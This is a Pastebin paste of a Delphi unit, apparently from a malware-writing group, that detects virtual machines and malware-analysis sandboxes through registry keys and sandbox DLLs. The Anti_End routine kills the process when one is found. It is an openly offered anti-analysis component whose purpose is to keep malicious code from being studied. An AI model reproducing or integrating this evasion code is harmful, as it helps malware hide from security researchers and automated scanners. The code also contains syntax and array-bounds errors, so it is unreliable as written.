Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //******************************************************************************
- // Unit : ANTIS
- // Autor : Fakedo0r .:[PD-TEAM]:.
- // Fecha : 04.04.2012
- // Modificacion: 12.08.2012
- // Creditos : Cobein
- // Descripcion : Detecta [VirtualPC / VMWare / VirtualBox / Anubis]
- // Detecta [Sandboxie / ThreatExpert / CWSandbox / JoeBox]
- // Uso : Anti_End;
- //******************************************************************************
- Unit UNT_ANTIS;
- //******************************************************************************
- // DECLARACION DE CLASES
- //******************************************************************************
- Interface
- Uses
- Windows, ShlObj, Messages, SysUtils;
- //******************************************************************************
- // DECLARACION DE FUNCIONES / PROCEDIMIENTOS
- //******************************************************************************
- Function IsVirtualPCPresent: Bool;
- Function IsInSandbox: Bool;
- Function Anti_End: Bool;
- //******************************************************************************
- // FUNCIONES / PROCEDIMIENTOS
- //******************************************************************************
- Implementation
- //******************************************************************************
- //<--- [VirtualPC / VMWare / VirtualBox / Anubis] --->
- //******************************************************************************
- Function IsVirtualPCPresent: Bool;
- Const
- sArrVM: Array [0 .. 3] Of String = ('VIRTUAL', 'VMWARE', 'VBOX', 'QEMU');
- Var
- hlKey: HKEY;
- sBuffer: String;
- sPathName: String;
- I: Integer;
- iRegType: Integer;
- iDataSize: Integer;
- Begin
- IsVirtualPCPresent := False;
- iRegType := 1;
- sPathName := 'SYSTEM\ControlSet001\Services\Disk\Enum';
- If RegOpenKeyEx($80000002, PChar(sPathName), 0, $20019, hlKey) = 0 Then
- If RegQueryValueEx(hlKey, '0', 0, @iRegType, Nil, @iDataSize) = 0 Then
- Begin
- SetLength(sBuffer, iDataSize);
- RegQueryValueEx(hlKey, '0', 0, @iRegType,
- PByte(PChar(sBuffer)), @iDataSize);
- For I := 0 To 3 Do
- If AnsiPos(UpperCase(sArrVM[I]), UpperCase(Trim(sBuffer))) > 0 Then
- IsVirtualPCPresent := True;
- End;
- RegCloseKey(hlKey);
- End;
- //******************************************************************************
- //<--- SANDBOX [Sandboxie / ThreatExpert / CWSandbox / JoeBox] --->
- //******************************************************************************
- Function IsInSandbox: Bool;
- Const
- sArrSB: Array [0 .. 1] Of String = ('76487-644-3177037-23510',
- '55274-640-2673064-23950');
- sArrDll: Array [0 .. 1] Of String = ('sbiedll.dll', 'dbghelp.dll');
- Var
- hlKey: HKEY;
- sBuffer: String;
- sPathName: String;
- I: Integer;
- hDll: Integer;
- iRegType: Integer;
- iDataSize: Integer;
- hSnapShot: Integer;
- Begin
- IsInSandbox := False;
- iRegType := 1;
- sPathName := 'Software\Microsoft\Windows\CurrentVersion':
- hDll := LoadLibrary(Pchar(sArrDll[0]));
- If hDll <> 0 Then
- IsInSandbox := True;
- FreeLibrary(hDll);
- hDll := LoadLibrary(Pchar(sArrDll[1]));
- If hDll <> 0 Then
- IsInSandbox := True;
- FreeLibrary(hDll);
- If RegOpenKeyEx($80000002, PChar(sPathName), 0, $20019, hlKey) = 0 Then
- If RegQueryValueEx(hlKey, 'ProductId', 0, @iRegType, Nil,
- @iDataSize) = 0 Then
- Begin
- SetLength(sBuffer, iDataSize);
- RegQueryValueEx(hlKey, 'ProductId', 0, @iRegType,
- PByte(PChar(sBuffer)), @iDataSize);
- For i := 0 To 2 Do
- If AnsiPos(sArrSB[i], Trim(sBuffer)) > 0 Then
- IsInSandbox := True;
- End;
- RegCloseKey(hlKey);
- End;
- //******************************************************************************
- //<--- LLAMADA MAIN --->
- //******************************************************************************
- Function Anti_End: Bool;
- Begin
- Anti_End := False;
- If IsVirtualPCPresent = True Or IsInSandbox = True Then
- ExitProcess(0);
- End;
- End.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement